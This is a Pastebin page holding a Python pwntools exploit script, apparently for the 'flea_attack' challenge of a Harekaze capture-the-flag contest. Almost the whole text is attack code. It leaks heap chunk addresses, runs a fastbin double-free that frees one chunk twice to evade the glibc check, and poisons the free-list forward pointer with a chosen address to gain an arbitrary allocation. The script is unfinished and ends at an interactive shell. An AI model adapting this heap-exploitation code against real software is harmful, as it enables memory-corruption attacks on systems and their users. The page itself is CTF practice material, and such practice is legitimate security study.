API tools faq
paste
Guest User

Untitled

a guest
Feb 23rd, 2018
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.01 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2.  
  3. import pwn
  4. from pwn import *
  5.  
  6. p = pwn.process("./flea_attack.elf")
  7. # p = pwn.remote("problem.harekaze.com",20175)
  8. raw_input("<ATTACH NOW>")
  9. p.recv()
  10. # the size is 0x04.
  11. p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
  12. p.recvuntil(">")
  13. p.sendline("1")
  14. p.recv()
  15. p.sendline("50")
  16. buf = "AAAA"
  17. p.sendline(buf)
  18. p.recvuntil("Addr: ")
  19. basechunk = int(p.recvuntil("\n").rstrip(),16)
  20. print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
  21. p.recvuntil(">")
  22. p.sendline("1")
  23. p.recv()
  24. p.sendline("50")
  25. p.sendline("lol")
  26. p.recvuntil("Addr: ")
  27. basechunk2 = int(p.recvuntil("\n").rstrip(),16)
  28. print " ADDRESS OF CHUNK1 AT: %x" % basechunk
  29. print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
  30. print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
  31. p.recvuntil(">")
  32. p.sendline("1")
  33. p.recv()
  34. p.sendline("50")
  35. p.sendline("lol")
  36. raw_input("<STOP1>")
  37. p.recvuntil(">")
  38. print " FREEING ORIGINAL CHUNK at %x" % basechunk
  39. p.sendline("2")
  40. p.recv()
  41. p.sendline("%x" % (basechunk))
  42. p.recvuntil(">")
  43. print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
  44. p.sendline("2")
  45. p.recv()
  46. p.sendline("%x" % (basechunk2))
  47. p.recvuntil(">")
  48. # p.interactive()
  49. print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
  50. p.sendline("2")
  51. p.recv()
  52. p.sendline("%x" % (basechunk))
  53. p.recvuntil(">")
  54. raw_input("<STOP2>")
  55. print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
  56. p.sendline("1")
  57. p.sendline("50")
  58. buf = p64(0x204056)
  59. p.sendline(buf)
  60. p.recvuntil("Addr: ")
  61. explsetup = int(p.recvuntil("\n").rstrip(),16)
  62. print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
  63. p.recvuntil(">")
  64. p.sendline("1")
  65. p.sendline("50")
  66. p.sendline("bbbb")
  67. p.recvuntil("Addr: ")
  68. idgaf = int(p.recvuntil("\n").rstrip(),16)
  69. print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
  70. p.recvuntil(">")
  71. p.sendline("1")
  72. p.sendline("50")
  73. p.sendline("cccc")
  74. p.recvuntil("Addr: ")
  75. explchunk = int(p.recvuntil("\n").rstrip(),16)
  76. p.recvuntil(">")
  77. print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
  78. print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
  79.  
  80. # reallocate 50, then add in "A"'s...
  81.  
  82. p.interactive()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!